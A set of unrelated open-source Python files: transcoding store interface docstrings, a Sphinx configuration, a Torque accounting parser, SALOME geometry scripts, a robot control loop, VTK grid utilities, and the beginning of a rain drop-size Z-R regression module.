videoWidthMultiple (int)
videoHeightMultiple (int)
videoPAR (int[2])
videoFramerate (int[2])
videoScaleMethod (VideoScaleMethodEnum)
For Audio/Video targets, it has the following additional fields:
tolerance (AudioVideoToleranceEnum)
For a Thumbnails targets, it has the following fields:
thumbsWidth (int)
thumbsHeight (int)
periodValue (int)
periodUnit (PeriodUnitEnum)
maxCount (int)
format (ThumbOutputTypeEnum)
ensureOne (bool)
"""
def retrieveGlobalNotifications(self):
"""
Returns a deferred.
The returned list contains all global notifications.
The result on success is a list of "container" objects
with the following fields depending on the notification type:
For all:
type (NotificationTypeEnum)
triggers (set of NotificationTriggerEnum)
timeout (int) can be None
retryMax (int) can be None
retrySleep (int) can be None
For type == NotificationTypeEnum.email:
subjectTemplate (str) can be None
bodyTemplate (str) can be None
attachments (set of DocumentTypeEnum)
recipients dict with MailAddressTypeEnum as keys
of list of tuple with (name, email)
where name can be None
For type == NotificationTypeEnum.http_request:
urlTemplate (str)
For type == NotificationTypeEnum.sql:
databaseURI (str)
sqlTemplate (str)
"""
def retrieveCustomerNotifications(self, custData):
"""
Returns a deferred.
The returned list contains all customers' notifications.
See retrieveGlobalNotifications for result specifications.
"""
def retrieveProfileNotifications(self, profData):
"""
Returns a deferred.
The returned list contains all profiles' notifications.
See retrieveGlobalNotifications for result specifications.
"""
def retrieveTargetNotifications(self, targData):
"""
Returns a deferred.
The returned list contains all targets' notifications.
See retrieveGlobalNotifications for result specifications.
"""
def retrieveActivities(self, type, states=None):
"""
Returns a deferred.
The result on success is a list of the activities
with the specified type and state in the specified
list states (if not None or empty)
as "container" objects with the following fields:
type (ActivityTypeEnum)
subtype (TranscodingTypeEnum or NotificationTypeEnum)
state (ActivityStateEnum)
startTime (datetime)
lastTime (dateTime)
customerIdentifier (str)
profileIdentifier (str)
targetIdentifier (str)
For type == transcoding, reference is a data container:
inputRelPath (str)
For type == notification:
trigger (NotificationTriggerEnum)
timeout (int)
retryCount (int)
retryMax (int)
retrySleep (int)
data (dict)
"""
def newActivity(self, type, subtype):
"""
Creates a new activity container of a specified type and subtype.
"""
def newCustomer(self, custId):
"""
Creates a new customer container.
It's not added to the store, it should be
filled and then the store method should be call.
"""
def newProfile(self, custData):
"""
Creates a new profile container for the specified customer.
It's not added to the store, it should be
filled and then the store method should be call.
"""
def newNotification(self, type, data):
"""
Creates a new notification container
of the specified type (NotificationTypeEnum).
The specified data must be customer data,
profile data, target data or None.
None: apply to all customers transcoding
Customer data: apply to all profiles transcoding
of the specified customer
Profile data: apply to a specific customer's
profile transcoding
Target data: apply to a specific target of a profile
It's not added to the store, it should be
filled and then the store method should be call.
"""
def newTarget(self, profData):
"""
Creates a new target container object.
"""
def newTargetConfig(self, targData):
"""
Creates a new target config container object.
"""
def newReport(self, profData):
"""
Creates a new report container object.
"""
def newTargetReport(self, repData):
"""
Creates a new target report container object.
"""
def newNotificationReport(self, repData, notifData):
"""
Creates a new notification report container object.
"""
|
jsafrane/openlmi-storage
|
doc/admin/conf.py
|
# -*- coding: utf-8 -*-
#
# OpenLMI Storage Provider documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 4 10:22:18 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../providers'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.viewcode']
plantuml_output_format='svg'
plantuml_latex_output_format='pdf'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'OpenLMI Storage Provider'
copyright = u'2012-2013, Red Hat Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5.1'
# The full version, including alpha/beta/rc tags.
release = '0.5.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'openlmitheme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["."]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'OpenLMIStorageProviderdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'OpenLMIStorageProvider.tex', u'OpenLMI Storage Provider Documentation',
u'Jan Safranek', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'openlmistorageprovider', u'OpenLMI Storage Provider Documentation',
[u'Jan Safranek'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'OpenLMIStorageProvider', u'OpenLMI Storage Provider Documentation',
u'Jan Safranek', 'OpenLMIStorageProvider', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
ubccr/tacc_stats
|
pickler/torque_acct.py
|
#!/usr/bin/env python
import os
import codecs
class TorqueAcct(object):
""" Process accounting files from torque """
def __init__(self, acct_file, host_name_ext):
self.ncpus = 0
self.nodes = 0
self.fieldmapping = {
"account": ["account", str],
"queue": ["partition", str],
"session": ["session", str],
"owner": ["username", str],
"group": ["group", str],
"exec_host": ["host_list", self.parsehostlist],
"jobname": ["job_name", str],
"user": ["user", str],
"Exit_status": ["status", int],
"Error_Path": ["error_path", str],
"Output_Path": ["output_path", str],
"ctime": ["submit", int],
"etime": ["eligible_time", int],
"qtime": ["queue_time", int],
"start": ["start_time", int],
"end": ["end_time", int],
"Resource_List.ncpus": ["requested_cpus", int],
"Resource_List.walltime": ["requested_walltime", str],
"Resource_List.nodect": ["requested_node", int],
"Resource_List.nodes": ["requested_nodelist", str],
"Resource_List.procs": ["requested_tasks", str],
"Resource_List.host": ["requested_host", str],
"Resource_List.tpn": ["requested_taskspernode", str],
"Resource_List.neednodes": ["requested_neednodes", str],
"Resource_List.mem": ["requested_memory", str],
"Resource_List.pmem": ["requested_vmemory", str],
"Resource_List.cput": ["requested_cpu_time", str],
"Resource_List.pvmem": ["requested_pvmem", str],
"Resource_List.vmem": ["requested_vmem", str],
"resources_used.cput": ["cpu_time", str],
"resources_used.mem": ["mem_used", str],
"resources_used.vmem": ["vmem_used", str],
"resources_used.walltime": ["wall_time", str]
}
self.batch_kind = 'TORQUE'
self.acct_file = acct_file
if len(host_name_ext) > 0:
self.name_ext = '.'+host_name_ext
else:
self.name_ext = ""
def get_host_list_path(self,acct,host_list_dir):
return None
def reader(self,start_time=0, end_time=9223372036854775807L, seek=0):
""" The file format of the Torque logs is sufficently different from the
others to warrant its own reader implmentation
"""
filelist = []
if os.path.isdir(self.acct_file):
for dir_name, subdir_list, file_list in os.walk(self.acct_file):
for fname in file_list:
filelist.append( os.path.join(self.acct_file,dir_name,fname) )
else:
filelist = [ self.acct_file ]
for fname in filelist:
filep = codecs.open(fname, "r", "utf-8", errors="replace")
if seek:
filep.seek(seek, os.SEEK_SET)
for line in filep:
acct = self.parseline(line)
if acct != None and start_time <= acct['end_time'] and acct['end_time'] < end_time:
yield acct
def parseline(self, line):
tokens = line.split(";")
if len(tokens) < 4:
return None
timestamp = tokens[0]
recordtype = tokens[1]
jobid = tokens[2]
record = ";".join(tokens[3:]).strip()
if recordtype != "E":
return None
parts = jobid.split(".")
acct = {"local_jobid": int(parts[0]), "id": jobid}
jobrecs = record.split(" ")
for jobrec in jobrecs:
items = jobrec.split("=")
if len(items) == 2:
try:
mapping = self.fieldmapping[items[0]]
acct[mapping[0]] = mapping[1](items[1])
except KeyError as e:
print line
raise e
except ValueError as e:
print line
raise e
acct['ncpus'] = self.ncpus
acct['nodes'] = self.nodes
return acct
def parsehostlist(self, hostlist):
self.ncpus = 0
hosts = {}
for item in hostlist.split("+"):
tokens = item.split("/")
if len(tokens) == 2:
hosts[tokens[0]] = 1
self.ncpus += 1
self.nodes = len(hosts)
return hosts.keys()
|
FedoraScientific/salome-geom
|
src/GEOM_SWIG/PAL_MESH_035_geometry.py
|
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D, OPEN CASCADE
#
# Copyright (C) 2003-2007 OPEN CASCADE, EADS/CCR, LIP6, CEA/DEN,
# CEDRAT, EDF R&D, LEG, PRINCIPIA R&D, BUREAU VERITAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
#####################################################################
#Created :15/02/2005
#Auhtor :KOVALTCHUK Alexey
#GUI test scenario :PAL-MESH-035 (geometry part)
#####################################################################
#
import salome
salome.salome_init()
import GEOM
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
#Box creation (2.2)
Box_1 = geompy.MakeBoxDXDYDZ(200, 400, 300)
geompy.addToStudy(Box_1, "Box_1")
#Cylinder creation (2.8)
Cylinder_1 = geompy.MakeCylinderRH(100, 300)
geompy.addToStudy(Cylinder_1, "Cylinder_1")
#Cone creation (2.13)
Cone_1 = geompy.MakeConeR1R2H(100, 50, 200)
geompy.addToStudy(Cone_1, "Cone_1")
#Explode box, cone and cylinder on faces and vertices(2.18)
ListOfFaces_Box_1 = geompy.SubShapeAll(Box_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Box_1 = len(ListOfFaces_Box_1)
for i in range (0, NbExplodedFaces_Box_1):
name = "Face_" + str(i+1)
geompy.addToStudyInFather(Box_1, ListOfFaces_Box_1[i], name)
ListOfVertices_Box_1 = geompy.SubShapeAll(Box_1, geompy.ShapeType["VERTEX"])
NbExplodedVertices_Box_1 = len(ListOfVertices_Box_1)
for i in range (0, NbExplodedVertices_Box_1):
name = "Vertex_" + str(i+1)
geompy.addToStudyInFather(Box_1, ListOfVertices_Box_1[i], name)
ListOfFaces_Cylinder_1 = geompy.SubShapeAll(Cylinder_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Cylinder_1 = len(ListOfFaces_Cylinder_1)
for i in range (0, NbExplodedFaces_Cylinder_1):
name = "Face_" + str(NbExplodedFaces_Box_1+i+1)
geompy.addToStudyInFather(Cylinder_1, ListOfFaces_Cylinder_1[i], name)
ListOfFaces_Cone_1 = geompy.SubShapeAll(Cone_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Cone_1 = len(ListOfFaces_Cone_1)
for i in range (0, NbExplodedFaces_Cone_1):
name = "Face_" + str(NbExplodedFaces_Box_1+NbExplodedFaces_Cylinder_1+i+1)
geompy.addToStudyInFather(Cone_1, ListOfFaces_Cone_1[i], name)
#Plane creation (2.32)
Plane_1 = geompy.MakePlaneThreePnt(ListOfVertices_Box_1[0], ListOfVertices_Box_1[1], ListOfVertices_Box_1[3], 600)
geompy.addToStudy(Plane_1, "Plane_1")
#Partition (2.32)
compound = geompy.MakeCompound([ListOfFaces_Cylinder_1[0], ListOfFaces_Cone_1[0]])
Partition_1 = geompy.MakeHalfPartition(compound, Plane_1)
geompy.addToStudy(Partition_1, "Partition_1")
#Explode partition on faces and vertices(2.38)
ListOfFaces_Partition_1 = geompy.SubShapeAll(Partition_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Partition_1 = len(ListOfFaces_Partition_1)
for i in range (0, NbExplodedFaces_Partition_1):
name = "Face_" + str(NbExplodedFaces_Box_1+NbExplodedFaces_Cylinder_1+NbExplodedFaces_Cone_1+i+1)
geompy.addToStudyInFather(Partition_1, ListOfFaces_Partition_1[i], name)
#Explode faces on vertices(2.43)
ListOfVertices_Face_7 = geompy.SubShapeAll(ListOfFaces_Cylinder_1[0], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_7 = len(ListOfVertices_Face_7)
for i in range (0, NbExplodedVertices_Face_7):
name = "Vertex_" + str(NbExplodedVertices_Box_1+i+1)
geompy.addToStudyInFather(ListOfFaces_Cylinder_1[0], ListOfVertices_Face_7[i], name)
ListOfVertices_Face_10 = geompy.SubShapeAll(ListOfFaces_Cone_1[0], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_10 = len(ListOfVertices_Face_10)
for i in range (0, NbExplodedVertices_Face_10):
name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+i+1)
geompy.addToStudyInFather(ListOfFaces_Cone_1[0], ListOfVertices_Face_10[i], name)
ListOfVertices_Face_15 = geompy.SubShapeAll(ListOfFaces_Partition_1[2], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_15 = len(ListOfVertices_Face_15)
for i in range (0, NbExplodedVertices_Face_15):
name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+NbExplodedVertices_Face_10+i+1)
geompy.addToStudyInFather(ListOfFaces_Partition_1[2], ListOfVertices_Face_15[i], name)
ListOfVertices_Face_18 = geompy.SubShapeAll(ListOfFaces_Partition_1[NbExplodedFaces_Partition_1-1], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_18 = len(ListOfVertices_Face_18)
for i in range (0, NbExplodedVertices_Face_18):
name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+NbExplodedVertices_Face_10+NbExplodedVertices_Face_15+i+1)
geompy.addToStudyInFather(ListOfFaces_Partition_1[NbExplodedFaces_Partition_1-1], ListOfVertices_Face_18[i], name)
salome.sg.updateObjBrowser(1)
|
simotek/tanko-bot
|
src/robotmain.py
|
# RobotMain - Simon Lees simon@simotek.net
# Copyright (C) 2015 Simon Lees
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from PyLibs.uiserver import UiServer, UiServerCallbacks
from PyLibs.arduinointerface import ArduinoInterface, ArduinoInterfaceCallbacks
import argparse
import time
uiServer = None
# only used when serial is stubbed out
def onDriveMotor(args):
print("On DriveMotor")
uiServer.announceLeftMotorSpeed(args[0])
uiServer.announceRightMotorSpeed(args[1])
if __name__ == '__main__':
parser = argparse.ArgumentParser("Main Robot control app")
#parser.add_argument("-s", "--no-serial", type=str, required=False, help="Stub out serial")
parser.add_argument('--no-serial', dest='noserial', action='store_true')
args = parser.parse_args()
serverCallbacks = UiServerCallbacks()
arduinoCallbacks = ArduinoInterfaceCallbacks()
uiServer = UiServer(serverCallbacks)
# hook up stub callbacks
if args.noserial:
serverCallbacks.sendDriveMotor.register(onDriveMotor)
else:
arduinoCallbacks.annLeftDriveMotor.register(uiServer.announceLeftMotorSpeed)
arduinoCallbacks.annRightDriveMotor.register(uiServer.announceRightMotorSpeed)
arduinoInterface = ArduinoInterface(arduinoCallbacks)
servercallbacks = uiServer.getCallbacks()
servercallbacks.sendDriveMotor.register(arduinoInterface.sendDriveMotorSpeed)
uiServer.setCallbacks(servercallbacks)
# Send Ready for status LED
ArduinoInterface.sendReady()
# Main app event loop
while True:
uiServer.processMessages()
arduinoInterface.processMessages()
time.sleep(0.01)
|
FluidityProject/multifluids
|
tools/tvtktools.py
|
from enthought.tvtk.api import tvtk
import math
import numpy
import scipy.linalg
# All returned arrays are cast into either numpy or numarray arrays
arr=numpy.array
class vtu:
"""Unstructured grid object to deal with VTK unstructured grids."""
def __init__(self, filename):
"""Creates a vtu object by reading the specified file."""
gridreader=tvtk.XMLUnstructuredGridReader(file_name=filename)
gridreader.update()
self.ugrid=gridreader.output
self.filename=filename
def GetScalarField(self, name):
"""Returns an array with the values of the specified scalar field."""
return arr(self.ugrid.point_data.get_array(name))
def GetVectorField(self, name):
"""Returns an array with the values of the specified vector field."""
return arr(self.ugrid.point_data.get_array(name))
def GetVectorNorm(self, name):
"""Return the field with the norm of the specified vector field."""
v = self.GetVectorField(name)
n = []
norm = scipy.linalg.norm
for node in range(self.ugrid.number_of_points):
n.append(norm(v[node]))
return arr(n)
def GetField(self,name):
"""Returns an array with the values of the specified field."""
pointdata=self.ugrid.point_data
vtkdata=pointdata.get_array(name)
nc=vtkdata.number_of_components
nt=vtkdata.number_of_tuples
array=arr(vtkdata)
if nc==9:
return array.reshape(nt,3,3)
elif nc==4:
return array.reshape(nt,2,2)
else:
return array.reshape(nt,nc)
def Write(self, filename=[]):
"""Writes the grid to a vtu file.
If no filename is specified it will use the name of the file originally
read in, thus overwriting it!
"""
if filename==[]:
filename=self.filename
gridwriter=tvtk.XMLUnstructuredGridWriter(file_name=filename, input=self.ugrid)
gridwriter.write()
def AddScalarField(self, name, array):
"""Adds a scalar field with the specified name using the values from the array."""
# In vtktools.py the following used SetNumberOfValues=len(array)
data = tvtk.FloatArray(number_of_tuples=len(array), name=name)
for i in range(len(array)):
data.set_value(i, array[i])
pointdata=self.ugrid.point_data
pointdata.add_array(data)
pointdata.set_active_scalars(name)
def AddVectorField(self, name, array):
"""Adds a vector field with the specified name using the values from the array."""
n=array.size
# In vtktools.py the following used SetNumberOfValues=n
data = tvtk.FloatArray(number_of_components=array.shape[1], number_of_tuples=n, name=name)
for i in range(n):
data.set_value(i, array.reshape(n)[i])
pointdata=self.ugrid.point_data
pointdata.add_array(data)
pointdata.set_active_vectors(name)
def AddField(self, name, array):
"""Adds a field with arbitrary number of components under the specified name using."""
n=array.size
sh=arr(array.shape)
# number of tuples is sh[0]
# number of components is the product of the rest of sh
data = vtk.vtkFloatArray(number_of_components=sh[1:].prod(), number_of_tuples=n, name=name)
flatarray=array.reshape(n)
for i in range(n):
data.set_value(i, flatarray[i])
pointdata=self.ugrid.point_data
pointdata.add_array(data)
def ApplyProjection(self, projection_x, projection_y, projection_z):
"""Applys a projection to the grid coordinates. This overwrites the existing values."""
npoints = self.ugrid.number_of_points
for i in range (npoints):
(x,y,z) = self.ugrid.get_point(i)
new_x = eval (projection_x)
new_y = eval (projection_y)
new_z = eval (projection_z)
self.ugrid.points.set_point(i, new_x, new_y, new_z)
def ProbeData(self, coordinates, name):
"""Interpolate field values at these coordinates."""
# Initialise locator
bbox = self.ugrid.bounds
locator = tvtk.PointLocator(data_set=self.ugrid, tolerance=10.0)
locator.update()
# Initialise probe
points = tvtk.Points()
ilen, jlen = coordinates.shape
for i in range(ilen):
points.insert_next_point(coordinates[i][0], coordinates[i][1], coordinates[i][2])
polydata = tvtk.PolyData(points=points)
probe = tvtk.ProbeFilter(input=polydata, source=self.ugrid)
probe.update()
# Reposition invalid nodes at nearest mesh vertices
alid_ids = probe.valid_points
valid_points = tvtk.Points()
valid_loc = 0
for i in range(ilen):
if valid_ids.get_tuple1(valid_loc) == i:
valid_points.insert_next_point(coordinates[i][0], coordinates[i][1], coordinates[i][2])
valid_loc = valid_loc + 1
else:
nearest = locator.find_closest_point([coordinates[i][0], coordinates[i][1], coordinates[i][2]])
point = self.ugrid.points.get_point(nearest)
valid_points.insert_next_point(point[0], point[1], point[2])
polydata.points=valid_points
probe.input=polydata
probe.update()
# Get final updated values
pointdata=probe.output.point_data
vtkdata=pointdata.get_array(name)
nc=vtkdata.number_of_components()
nt=vtkdata.number_of_tuples()
array = arr(vtkdata)
array.shape = (nt,nc)
return array
def RemoveField(self, name):
"""Removes said field from the unstructured grid."""
self.ugrid.point_data.remove_array(name)
def GetLocations(self):
"""Returns an array with the locations of the nodes."""
return arr(self.ugrid.points.data)
def GetCellPoints(self, id):
"""Returns an array with the node numbers of each cell (ndglno)."""
idlist=tvtk.IdList()
self.ugrid.get_cell_points(id, idlist)
return arr([idlist.get_id(i) for i in range(idlist.number_of_ids)])
def GetFieldNames(self):
"""Returns the names of the available fields."""
pointdata=self.ugrid.point_data
return [pointdata.get_array_name(i) for i in range(pointdata.number_of_arrays)]
def GetPointCells(self, id):
"""Return an array with the elements which contain a node."""
idlist=tvtk.IdList()
self.ugrid.get_point_cells(id, idlist)
return arr([idlist.get_id(i) for i in range(idlist.number_of_ids())])
def GetPointPoints(self, id):
"""Return the nodes connecting to a given node."""
cells = self.GetPointCells(id)
lst = []
for cell in cells:
lst = lst + list(self.GetCellPoints(cell))
s = set(lst) # remove duplicates
return arr(list(s)) # make into a list again
def GetDistance(self, x, y):
"""Return the distance in physical space between x and y."""
posx = self.ugrid.get_point(x)
posy = self.ugrid.get_point(y)
return math.sqrt(sum([(posx[i] - posy[i])**2 for i in range(len(posx))]))
def Crop(self, min_x, max_x, min_y, max_y, min_z, max_z):
"""Trim off the edges defined by a bounding box."""
trimmer = tvtk.ExtractUnstructuredGrid(input=self.ugrid, extent=(min_x, max_x, min_y, max_y, min_z, max_z))
trimmer.update()
trimmed_ug = trimmer.output
self.ugrid = trimmed_ug
def StructuredPointProbe(self, nx, ny, nz, bounding_box=None):
""" Probe the unstructured grid dataset using a structured points dataset. """
bbox = [0.0,0.0, 0.0,0.0, 0.0,0.0]
if bounding_box==None:
bbox = self.ugrid.bounds
else:
bbox = bounding_box
spacing = [0.0, 0.0, 0.0]
if nx>1: spacing[0] = (bbox[1]-bbox[0])/(nx-1.0)
if ny>1: spacing[1] = (bbox[3]-bbox[2])/(ny-1.0)
if nz>1: spacing[2] = (bbox[5]-bbox[4])/(nz-1.0)
sgrid = tvtk.StructuredPoints(dimensions=(nx, ny, nz), origin=[bbox[0],bbox[2],bbox[4]], spacing=spacing)
probe = tvtk.ProbeFilter (source=self.ugrid, input=sgrid)
probe.update()
return probe.output
|
FedoraScientific/salome-smesh
|
src/Tools/blocFissure/gmu/facesVolumesToriques.py
|
# -*- coding: utf-8 -*-
import logging
from geomsmesh import geompy
from extractionOrientee import extractionOrientee
from getSubshapeIds import getSubshapeIds
# -----------------------------------------------------------------------------
# --- TORE
# --- faces toriques et volumes du tore
def facesVolumesToriques(tore, plan, facesDefaut):
"""
Extraction des deux faces et volumes du tore partitionné, qui suivent la génératrice elliptique.
@param tore : le tore partitionné et coupé.
@param plan : le plan de coupe
@return (facetore1,facetore2) les 2 faces selon la génératrice
"""
logging.info("start")
centre = geompy.MakeVertexOnSurface(plan, 0.5, 0.5)
normal = geompy.GetNormal(plan, centre)
reference = geompy.MakeTranslationVector(centre, normal)
[facesInPlan, facesOutPlan, facesOnPlan] = extractionOrientee(plan, tore, reference, "FACE", 1.e-2, "faceTorePlan_")
[facesInSide, facesOutSide, facesOnSide] = extractionOrientee(facesDefaut, tore, reference, "FACE", 1.e-2, "faceTorePeau_")
facesIdInPlan = getSubshapeIds(tore, facesInPlan)
facesIdOutPlan = getSubshapeIds(tore, facesOutPlan)
facesIdOnSide = getSubshapeIds(tore, facesOnSide)
facesIdInSide = getSubshapeIds(tore, facesInSide)
facesIdOutSide = getSubshapeIds(tore, facesOutSide)
#facesIdInOutSide = facesIdInSide + facesIdOutSide
facetore1 = None
faceTore2 = None
for i, faceId in enumerate(facesIdInPlan):
if faceId not in facesIdOnSide:
facetore1 = facesInPlan[i]
break
for i, faceId in enumerate(facesIdOutPlan):
if faceId not in facesIdOnSide:
facetore2 = facesOutPlan[i]
break
#[facetore1,facetore2] = geompy.GetShapesOnShape(pipe0, tore, geompy.ShapeType["FACE"], GEOM.ST_ON)
geompy.addToStudyInFather( tore, facetore1, 'facetore1' )
geompy.addToStudyInFather( tore, facetore2, 'facetore2' )
[volumeTore1, volumeTore2] = geompy.ExtractShapes(tore, geompy.ShapeType["SOLID"], True)
geompy.addToStudyInFather( tore, volumeTore1, 'volumeTore1' )
geompy.addToStudyInFather( tore, volumeTore2, 'volumeTore2' )
return facetore1, facetore2, volumeTore1, volumeTore2
|
nguy/pyparticleprobe
|
pyparticleprobe/dsd_calcs/zr.py
|
"""
pyparticleprobe.dsd_calcs.zr
===============================
A grouping of functions for calculations of a Z-R relationship from a drop
size distribution.
Adapted by Nick Guy.
"""
# HISTORY::
# 28 Feb 2014 - Nick Guy. NRC, NOAA/NSSL (nick.guy@noaa.gov)
# Converted NCL functions below to Python
# FUNCTIONS::
# linreg - Least squares linear regression fit
# regfit_powerlaw - Create a fit line from the regression data
# SD_filter - Filter a variable given a standard deviation
# regfit_abcd - Calculate a,b,c,d power law coefficients from regression data
# save_stats - Save a number of statistics into a text file for documentation
# get_zr_linreg - Solve for a,b,c,d coefficient and exponents in ZR relationship
#-------------------------------------------------------------------
# Load the needed packages
import numpy as np
from scipy import stats
#-------------------------------------------------------------------
# Define various constants that may be used for calculations
#
#===============================================================
# BEGIN FUNCTIONS
#**===============================================================
def linreg(Z,R):
"""Calculate the linear regression of two variables
INPUT::
Z = Reflectivity [mm^6 m^-3]
R = Rainfall rate [mm h^-1]
OUTPUT::
slope = Slope of the regression line
intercept = Intercept of the regression line
rVal = Correlation coefficient
pVal = Two-sided P-value test (null hypothesis slope = 0)
std_err = Standard Error of estimate
USAGE::
slope, intercept, r_value, p_value, std_err = linreg(x,y)
NOTES::
The masked stats function is used, otherwise the regression is performed on
all data.
Note that both variables are put in log-base10 space, to keep linear and because
the vast majority of data is generally weighted to lower values.
"""
#---------------------------------------
# Use the Scipy linear regression algorithm to calculate
slope, intercept, rVal, pVal, std_err = stats.mstats.linregress(np.ma.log10(Z),np.ma.log10(R))
return slope, intercept, rVal, pVal, std_err
#**====================================================
def regfit_powerlaw(Z,slope,intercept,limLo=1E-2,limHi=1E6,Rtest=False):
